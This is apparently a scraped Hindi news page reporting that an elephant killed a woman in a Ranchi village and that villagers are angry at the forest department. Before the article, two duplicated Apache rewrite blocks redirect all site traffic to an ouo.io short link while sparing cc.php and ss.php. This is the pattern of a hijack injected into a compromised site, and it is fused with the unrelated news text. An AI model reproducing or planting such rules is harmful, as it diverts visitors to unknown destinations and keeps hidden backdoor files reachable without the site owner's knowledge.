
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 310
Nextरांची (झारखंड)। रांची के तमाड़ थाना क्षेत्र के बरलंगा गांव में एक हाथी ने जमकर आतंक मचाते हुए एक महिला को कुचल कर मार डाला। बाहा देवी नाम की महिला की मौके पर ही मौत हो गई। घटना देर रात लगभग 12 बजे की है। घटना के बाद से ग्रामीणों में वन विभाग के प्रति रोष देखा जा रहा है।
जानकारी के अनुसार हाथी के हमले का शिकार हुई महिला शौच के लिए बाहर निकली थी तभी एक विशालकाय हाथी ने उसे अपनी चपेट में लेकर उसे पटक-पटक कर मार डाला। इस घटना की सूचना वन विभाग को रात में ही दे दी गई थी। मगर वन विभाग के अधिकारी सुबह 8 बजे घटनास्थल पर पहुंचे। अधिकारियों ने मृतक के परिजन को 50 हजार रुपये मुआवजा के तौर पर दिए और पोस्टमार्टम के बाद और 3.5 लाख रुपये देने का आश्वासन दिया। तमाड़ पुलिस ने शव को अपने कब्जे में लेकर उसे पोस्टमार्टम के लिए रिम्स भेज दिया है। आपको बता दें कि एक महीना के अंदर हाथियों के हमले की यह दूसरी घटना है। हाथियों के उत्पात से हो रहे जान-माल के नुकसान से ग्रामीण वन विभाग के प्रति काफी आक्रोशित हैं।